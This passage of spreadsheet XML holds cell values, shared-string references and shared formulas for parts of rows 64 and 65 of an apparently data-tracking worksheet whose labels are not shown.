        <v>4.0</v>
      </c>
      <c r="DS64" s="108">
        <v>5.0</v>
      </c>
      <c r="DT64" s="108">
        <v>50447.0</v>
      </c>
      <c r="DU64" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV64" s="108">
        <f t="shared" si="91"/>
        <v>50447</v>
      </c>
      <c r="DW64" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX64" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY64" s="108" t="s">
        <v>1266</v>
      </c>
      <c r="DZ64" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA64" s="108">
        <v>3.0</v>
      </c>
      <c r="EB64" s="108">
        <v>4.0</v>
      </c>
      <c r="EC64" s="109">
        <v>3.0</v>
      </c>
      <c r="ED64" s="109">
        <v>0.0</v>
      </c>
      <c r="EE64" s="109">
        <v>1.0</v>
      </c>
      <c r="EF64" s="109">
        <v>5.0</v>
      </c>
      <c r="EG64" s="109">
        <v>0.0</v>
      </c>
      <c r="EH64" s="109">
        <v>5.0</v>
      </c>
      <c r="EI64" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ64" s="109">
        <v>0.0</v>
      </c>
      <c r="EK64" s="109">
        <v>4.0</v>
      </c>
      <c r="EL64" s="109">
        <v>4.0</v>
      </c>
      <c r="EM64" s="109">
        <v>0.0</v>
      </c>
      <c r="EN64" s="109">
        <v>1.0</v>
      </c>
      <c r="EO64" s="109">
        <v>5.0</v>
      </c>
      <c r="EP64" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ64" s="109">
        <v>5.0</v>
      </c>
      <c r="ER64" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES64" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET64" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU64" s="110">
        <f t="shared" si="30"/>
        <v>0.25</v>
      </c>
      <c r="EV64" s="110">
        <f t="shared" si="31"/>
        <v>0.25</v>
      </c>
      <c r="EW64" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX64" s="110">
        <f t="shared" si="33"/>
        <v>1.25</v>
      </c>
      <c r="EY64" s="110">
        <f t="shared" si="34"/>
        <v>1.25</v>
      </c>
      <c r="EZ64" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA64" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB64" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC64" s="111" t="s">
        <v>1267</v>
      </c>
      <c r="FD64" s="111">
        <v>7.0</v>
      </c>
      <c r="FE64" s="111">
        <v>13.0</v>
      </c>
      <c r="FF64" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG64" s="111" t="s">
        <v>1268</v>
      </c>
      <c r="FH64" s="111">
        <v>5.0</v>
      </c>
      <c r="FI64" s="111">
        <v>9.0</v>
      </c>
      <c r="FJ64" s="111" t="s">
        <v>1070</v>
      </c>
      <c r="FK64" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL64" s="111" t="str">
        <f t="shared" si="95"/>
        <v>50447, 2002752, 2002749</v>
      </c>
      <c r="FM64" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN64" s="111" t="s">
        <v>1070</v>
      </c>
      <c r="FO64" s="111" t="s">
        <v>1269</v>
      </c>
      <c r="FP64" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ64" s="111">
        <v>4.0</v>
      </c>
      <c r="FR64" s="111">
        <v>8.0</v>
      </c>
      <c r="FS64" s="112">
        <v>3.0</v>
      </c>
      <c r="FT64" s="112">
        <v>1.0</v>
      </c>
      <c r="FU64" s="112">
        <v>7.0</v>
      </c>
      <c r="FV64" s="112">
        <v>5.0</v>
      </c>
      <c r="FW64" s="112">
        <v>8.0</v>
      </c>
      <c r="FX64" s="112">
        <v>9.0</v>
      </c>
      <c r="FY64" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ64" s="112">
        <v>0.0</v>
      </c>
      <c r="GA64" s="112">
        <v>4.0</v>
      </c>
      <c r="GB64" s="112">
        <v>4.0</v>
      </c>
      <c r="GC64" s="112">
        <v>1.0</v>
      </c>
      <c r="GD64" s="112">
        <v>5.0</v>
      </c>
      <c r="GE64" s="112">
        <v>5.0</v>
      </c>
      <c r="GF64" s="112">
        <v>4.0</v>
      </c>
      <c r="GG64" s="112">
        <v>5.0</v>
      </c>
      <c r="GH64" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI64" s="113">
        <f t="shared" si="40"/>
        <v>1</v>
      </c>
      <c r="GJ64" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK64" s="113">
        <f t="shared" si="42"/>
        <v>1.75</v>
      </c>
      <c r="GL64" s="113">
        <f t="shared" si="43"/>
        <v>1.25</v>
      </c>
      <c r="GM64" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN64" s="113">
        <f t="shared" si="45"/>
        <v>2.25</v>
      </c>
      <c r="GO64" s="113">
        <f t="shared" si="46"/>
        <v>1.25</v>
      </c>
      <c r="GP64" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ64" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR64" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS64" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT64" s="94"/>
      <c r="GU64" s="116">
        <v>40511.0</v>
      </c>
      <c r="GV64" s="116">
        <v>1.0</v>
      </c>
      <c r="GW64" s="116">
        <v>2.0</v>
      </c>
      <c r="GX64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD64" s="131">
        <v>40511.0</v>
      </c>
      <c r="HE64" s="131">
        <v>40511.0</v>
      </c>
      <c r="HF64" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG64" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH64" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI64" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ64" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK64" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL64" s="93">
        <v>3.0</v>
      </c>
      <c r="HM64" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN64" s="93">
        <v>1.0</v>
      </c>
      <c r="HO64" s="93">
        <v>0.0</v>
      </c>
      <c r="HP64" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ64" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR64" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS64" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT64" s="139" t="s">
        <v>443</v>
      </c>
      <c r="HU64" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV64" s="119" t="s">
        <v>1270</v>
      </c>
      <c r="HW64" s="119">
        <v>4.0</v>
      </c>
      <c r="HX64" s="119">
        <v>6.0</v>
      </c>
      <c r="HY64" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ64" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA64" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB64" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC64" s="120" t="s">
        <v>1271</v>
      </c>
      <c r="ID64" s="120" t="s">
        <v>1271</v>
      </c>
      <c r="IE64" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF64" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG64" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH64" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II64" s="99" t="s">
        <v>1272</v>
      </c>
      <c r="IJ64" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK64" s="99">
        <v>3.0</v>
      </c>
      <c r="IL64" s="99">
        <v>1.0</v>
      </c>
      <c r="IM64" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN64" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO64" s="98">
        <v>1.0</v>
      </c>
      <c r="IP64" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ64" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR64" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS64" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT64" s="127"/>
      <c r="IU64" s="127"/>
      <c r="IV64" s="127"/>
      <c r="IW64" s="127"/>
      <c r="IX64" s="127"/>
      <c r="IY64" s="127"/>
      <c r="IZ64" s="127"/>
      <c r="JA64" s="127"/>
      <c r="JB64" s="127"/>
      <c r="JC64" s="127"/>
      <c r="JD64" s="127"/>
      <c r="JE64" s="127"/>
      <c r="JF64" s="127"/>
      <c r="JG64" s="127"/>
      <c r="JH64" s="127"/>
      <c r="JI64" s="127"/>
      <c r="JJ64" s="127"/>
      <c r="JK64" s="127"/>
      <c r="JL64" s="127"/>
      <c r="JM64" s="127"/>
      <c r="JN64" s="127"/>
      <c r="JO64" s="127"/>
      <c r="JP64" s="127"/>
      <c r="JQ64" s="127"/>
      <c r="JR64" s="127"/>
      <c r="JS64" s="127"/>
      <c r="JT64" s="127"/>
      <c r="JU64" s="127"/>
      <c r="JV64" s="127"/>
      <c r="JW64" s="127"/>
      <c r="JX64" s="127"/>
      <c r="JY64" s="127"/>
      <c r="JZ64" s="127"/>
      <c r="KA64" s="127"/>
      <c r="KB64" s="127"/>
      <c r="KC64" s="127"/>
      <c r="KD64" s="127"/>
      <c r="KE64" s="127"/>
      <c r="KF64" s="127"/>
      <c r="KG64" s="127"/>
      <c r="KH64" s="127"/>
      <c r="KI64" s="127"/>
      <c r="KJ64" s="127"/>
      <c r="KK64" s="127"/>
      <c r="KL64" s="127"/>
      <c r="KM64" s="127"/>
      <c r="KN64" s="127"/>
      <c r="KO64" s="127"/>
      <c r="KP64" s="127"/>
      <c r="KQ64" s="127"/>
      <c r="KR64" s="127"/>
      <c r="KS64" s="127"/>
      <c r="KT64" s="127"/>
      <c r="KU64" s="127"/>
      <c r="KV64" s="127"/>
      <c r="KW64" s="127"/>
      <c r="KX64" s="127"/>
      <c r="KY64" s="127"/>
      <c r="KZ64" s="127"/>
      <c r="LA64" s="127"/>
      <c r="LB64" s="127"/>
      <c r="LC64" s="127"/>
      <c r="LD64" s="127"/>
      <c r="LE64" s="127"/>
      <c r="LF64" s="127"/>
      <c r="LG64" s="127"/>
      <c r="LH64" s="127"/>
      <c r="LI64" s="127"/>
      <c r="LJ64" s="127"/>
      <c r="LK64" s="127"/>
      <c r="LL64" s="127"/>
      <c r="LM64" s="127"/>
      <c r="LN64" s="127"/>
      <c r="LO64" s="127"/>
      <c r="LP64" s="127"/>
      <c r="LQ64" s="127"/>
      <c r="LR64" s="127"/>
      <c r="LS64" s="127"/>
      <c r="LT64" s="127"/>
      <c r="LU64" s="127"/>
      <c r="LV64" s="127"/>
      <c r="LW64" s="127"/>
      <c r="LX64" s="127"/>
      <c r="LY64" s="127"/>
      <c r="LZ64" s="127"/>
      <c r="MA64" s="127"/>
      <c r="MB64" s="127"/>
      <c r="MC64" s="127"/>
      <c r="MD64" s="127"/>
      <c r="ME64" s="127"/>
      <c r="MF64" s="127"/>
      <c r="MG64" s="127"/>
      <c r="MH64" s="127"/>
      <c r="MI64" s="127"/>
      <c r="MJ64" s="127"/>
      <c r="MK64" s="127"/>
      <c r="ML64" s="127"/>
      <c r="MM64" s="127"/>
      <c r="MN64" s="127"/>
      <c r="MO64" s="127"/>
      <c r="MP64" s="127"/>
      <c r="MQ64" s="127"/>
      <c r="MR64" s="127"/>
      <c r="MS64" s="127"/>
      <c r="MT64" s="127"/>
      <c r="MU64" s="127"/>
      <c r="MV64" s="127"/>
      <c r="MW64" s="127"/>
      <c r="MX64" s="127"/>
      <c r="MY64" s="127"/>
      <c r="MZ64" s="127"/>
      <c r="NA64" s="127"/>
      <c r="NB64" s="127"/>
      <c r="NC64" s="127"/>
      <c r="ND64" s="127"/>
      <c r="NE64" s="127"/>
      <c r="NF64" s="127"/>
      <c r="NG64" s="127"/>
      <c r="NH64" s="127"/>
      <c r="NI64" s="127"/>
      <c r="NJ64" s="127"/>
      <c r="NK64" s="127"/>
      <c r="NL64" s="127"/>
      <c r="NM64" s="127"/>
      <c r="NN64" s="127"/>
      <c r="NO64" s="127"/>
      <c r="NP64" s="127"/>
      <c r="NQ64" s="127"/>
      <c r="NR64" s="127"/>
      <c r="NS64" s="127"/>
      <c r="NT64" s="127"/>
      <c r="NU64" s="127"/>
      <c r="NV64" s="127"/>
      <c r="NW64" s="127"/>
      <c r="NX64" s="127"/>
      <c r="NY64" s="127"/>
    </row>
    <row r="65" ht="153.75" customHeight="1">
      <c r="B65" s="89" t="s">
        <v>357</v>
      </c>
      <c r="C65" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D65" s="90" t="s">
        <v>358</v>
      </c>
      <c r="E65" s="90" t="s">
        <v>1230</v>
      </c>
      <c r="F65" s="90" t="s">
        <v>1231</v>
      </c>
      <c r="G65" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H65" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I65" s="92" t="s">
        <v>1273</v>
      </c>
      <c r="J65" s="92" t="s">
        <v>1274</v>
      </c>
      <c r="K65" s="92" t="s">
        <v>1275</v>
      </c>
      <c r="L65" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M65" s="93">
        <v>260.0</v>
      </c>
      <c r="N65" s="93">
        <v>236.0</v>
      </c>
      <c r="O65" s="93">
        <v>0.0</v>
      </c>
      <c r="P65" s="93">
        <v>1.0</v>
      </c>
      <c r="Q65" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R65" s="93">
        <v>1.0</v>
      </c>
      <c r="S65" s="93">
        <v>0.0</v>
      </c>
      <c r="T65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U65" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V65" s="96" t="s">
        <v>12</v>
      </c>
      <c r="W65" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X65" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y65" s="96" t="s">
        <v>1276</v>
      </c>
      <c r="Z65" s="96" t="s">
        <v>512</v>
      </c>
      <c r="AA65" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB65" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC65" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD65" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE65" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF65" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG65" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH65" s="99" t="s">
        <v>1277</v>
      </c>
      <c r="AI65" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ65" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL65" s="100">
        <v>0.0</v>
      </c>
      <c r="AM65" s="100">
        <v>0.0</v>
      </c>
      <c r="AN65" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP65" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ65" s="100">
        <v>0.0</v>
      </c>
      <c r="AR65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX65" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY65" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ65" s="100">
        <v>0.0</v>
      </c>
      <c r="BA65" s="102">
        <v>260.0</v>
      </c>
      <c r="BB65" s="102">
        <v>0.0</v>
      </c>
      <c r="BC65" s="102">
        <v>0.0</v>
      </c>
      <c r="BD65" s="102">
        <v>0.0</v>
      </c>
      <c r="BE65" s="102">
        <v>0.0</v>
      </c>
      <c r="BF65" s="102">
        <v>0.0</v>
      </c>
      <c r="BG65" s="102">
        <v>0.0</v>
      </c>
      <c r="BH65" s="102">
        <v>0.0</v>
      </c>
      <c r="BI65" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ65" s="102">
        <v>0.0</v>
      </c>
      <c r="BK65" s="102">
        <v>0.0</v>
      </c>
      <c r="BL65" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM65" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN65" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO65" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP65" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ65" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR65" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS65" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT65" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU65" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV65" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX65" s="104">
        <v>0.0</v>
      </c>
      <c r="BY65" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ65" s="101" t="s">
        <v>843</v>
      </c>
      <c r="CA65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB65" s="104">
        <v>0.0</v>
      </c>
      <c r="CC65" s="104">
        <v>0.0</v>
      </c>
      <c r="CD65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF65" s="104" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CG65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI65" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ65" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK65" s="104">
        <v>0.0</v>
      </c>
      <c r="CL65" s="104">
        <v>0.0</v>
      </c>
      <c r="CM65" s="105">
        <v>260.0</v>
      </c>
      <c r="CN65" s="105">
        <v>0.0</v>
      </c>
      <c r="CO65" s="105">
        <v>0.0</v>
      </c>
      <c r="CP65" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ65" s="105">
        <v>0.0</v>
      </c>
      <c r="CR65" s="105">
        <v>0.0</v>
      </c>
      <c r="CS65" s="105">
        <v>0.0</v>
      </c>
      <c r="CT65" s="105">
        <v>0.0</v>
      </c>
      <c r="CU65" s="105">
        <v>0.0</v>
      </c>
      <c r="CV65" s="105">
        <v>0.0</v>
      </c>
      <c r="CW65" s="105">
        <v>0.0</v>
      </c>
      <c r="CX65" s="105">
        <v>0.0</v>
      </c>
      <c r="CY65" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ65" s="105">
        <v>0.0</v>
      </c>
      <c r="DA65" s="105">
        <v>0.0</v>
      </c>
      <c r="DB65" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC65" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD65" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE65" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF65" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG65" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH65" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI65" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ65" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK65" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL65" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM65" s="108" t="s">
        <v>1278</v>
      </c>
      <c r="DN65" s="108">
        <v>2.0</v>
      </c>
      <c r="DO65" s="108">
        <v>19656.0</v>
      </c>
      <c r="DP65" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ65" s="108" t="s">
        <v>1278</v>
      </c>
      <c r="DR65" s="108">
        <v>2.0</v>
      </c>
      <c r="DS65" s="108">
        <v>19656.0</v>
      </c>
      <c r="DT65" s="108" t="s">
        <v>1278</v>
      </c>
      <c r="DU65" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV65" s="108" t="str">
        <f t="shared" si="91"/>
        <v>50447, 31939</v>
      </c>
      <c r="DW65" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX65" s="108" t="s">
        <v>1278</v>
      </c>
      <c r="DY65" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ65" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA65" s="108">
        <v>0.0</v>
      </c>
      <c r="EB65" s="108">
        <v>0.0</v>
      </c>
      <c r="EC65" s="109">
        <v>260.0</v>
      </c>
      <c r="ED65" s="109">
        <v>0.0</v>
      </c>
      <c r="EE65" s="109">
        <v>1.0</v>
      </c>
      <c r="EF65" s="109">
        <v>19656.0</v>
      </c>
      <c r="EG65" s="109">
        <v>0.0</v>
      </c>
      <c r="EH65" s="109">
        <v>19656.0</v>
      </c>
      <c r="EI65" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ65" s="109">
        <v>0.0</v>
      </c>
      <c r="EK65" s="109">
        <v>0.0</v>
      </c>
      <c r="EL65" s="109">
        <v>0.0</v>
      </c>
      <c r="EM65" s="109">
        <v>0.0</v>
      </c>
      <c r="EN65" s="109">
        <v>1.0</v>
      </c>
      <c r="EO65" s="109">
        <v>19656.0</v>
      </c>
      <c r="EP65" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ65" s="109">
        <v>19656.0</v>
      </c>
      <c r="ER65" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES65" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET65" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU65" s="110">
        <f t="shared" si="30"/>
        <v>1</v>
      </c>
      <c r="EV65" s="110">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="EW65" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX65" s="110">
        <f t="shared" si="33"/>
        <v>19656</v>
      </c>
      <c r="EY65" s="110">
        <f t="shared" si="34"/>
        <v>19656</v>
      </c>
      <c r="EZ65" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA65" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB65" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC65" s="111" t="s">
        <v>1279</v>
      </c>
      <c r="FD65" s="111">
        <v>6.0</v>
      </c>
      <c r="FE65" s="111">
        <v>32818.0</v>
      </c>
      <c r="FF65" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG65" s="111" t="s">
        <v>1280</v>
      </c>
      <c r="FH65" s="111">
        <v>4.0</v>
      </c>
      <c r="FI65" s="111">
        <v>32752.0</v>
      </c>
      <c r="FJ65" s="111" t="s">
        <v>1279</v>
      </c>
      <c r="FK65" s="111">
        <v>2002749.0</v>
      </c>
      <c r="FL65" s="111" t="str">
        <f t="shared" si="95"/>
        <v>50447, 31939, 2002749, 2002752, 2012885, 2009004</v>
      </c>
      <c r="FM65" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN65" s="111" t="s">
        <v>1279</v>
      </c>
      <c r="FO65" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP65" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ65" s="111">
        <v>0.0</v>
      </c>
      <c r="FR65" s="111">
        <v>0.0</v>
      </c>
      <c r="FS65" s="112">
        <v>260.0</v>
      </c>
      <c r="FT65" s="112">
        <v>257.0</v>
      </c>
      <c r="FU65" s="112">
        <v>6593.0</v>
      </c>
      <c r="FV65" s="112">
        <v>19656.0</v>
      </c>
      <c r="FW65" s="112">
        <v>13162.0</v>
      </c>
      <c r="FX65" s="112">
        <v>19722.0</v>
      </c>
      <c r="FY65" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ65" s="112">
        <v>0.0</v>
      </c>
      <c r="GA65" s="112">
        <v>0.0</v>
      </c>
      <c r="GB65" s="112">
        <v>0.0</v>
      </c>
      <c r="GC65" s="112">
        <v>257.0</v>
      </c>
      <c r="GD65" s="112">
        <v>6549.0</v>
      </c>
      <c r="GE65" s="112">
        <v>19656.0</v>
      </c>
      <c r="GF65" s="112">
        <v>13096.0</v>
      </c>
      <c r="GG65" s="112">
        <v>19656.0</v>
      </c>
      <c r="GH65" s="113">
        <f t="shared" si="39"/>
        <v>1.088983051</v>
      </c>
      <c r="GI65" s="113">
        <f t="shared" si="40"/>
        <v>1.088983051</v>
      </c>
      <c r="GJ65" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK65" s="113">
        <f t="shared" si="42"/>
        <v>6593</v>
      </c>
      <c r="GL65" s="113">
        <f t="shared" si="43"/>
        <v>6549</v>
      </c>
      <c r="GM65" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN65" s="113">
        <f t="shared" si="45"/>
        <v>19722</v>
      </c>
      <c r="GO65" s="113">
        <f t="shared" si="46"/>
        <v>19656</v>
      </c>
      <c r="GP65" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ65" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR65" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS65" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT65" s="94"/>
      <c r="GU65" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV65" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW65" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF65" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG65" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH65" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI65" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ65" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK65" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL65" s="93">
        <v>260.0</v>
      </c>
      <c r="HM65" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN65" s="93">
        <v>0.0</v>
      </c>
      <c r="HO65" s="93">
        <v>0.0</v>
      </c>
      <c r="HP65" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ65" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR65" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS65" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT65" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU65" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV65" s="119" t="s">
        <v>1281</v>
      </c>
      <c r="HW65" s="119">
        <v>2.0</v>
      </c>
      <c r="HX65" s="119">
        <v>12520.0</v>
      </c>
      <c r="HY65" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ65" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA65" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB65" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC65" s="120">
        <v>14984.0</v>
      </c>
      <c r="ID65" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE65" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF65" s="120">
        <v>14984.0</v>
      </c>
      <c r="IG65" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH65" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II65" s="99" t="s">
        <v>12</v>
      </c>
